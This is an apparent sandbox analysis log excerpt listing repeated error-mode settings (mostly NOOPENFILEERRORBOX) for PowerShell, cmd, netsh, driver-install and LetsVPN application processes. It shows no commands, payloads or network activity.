Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
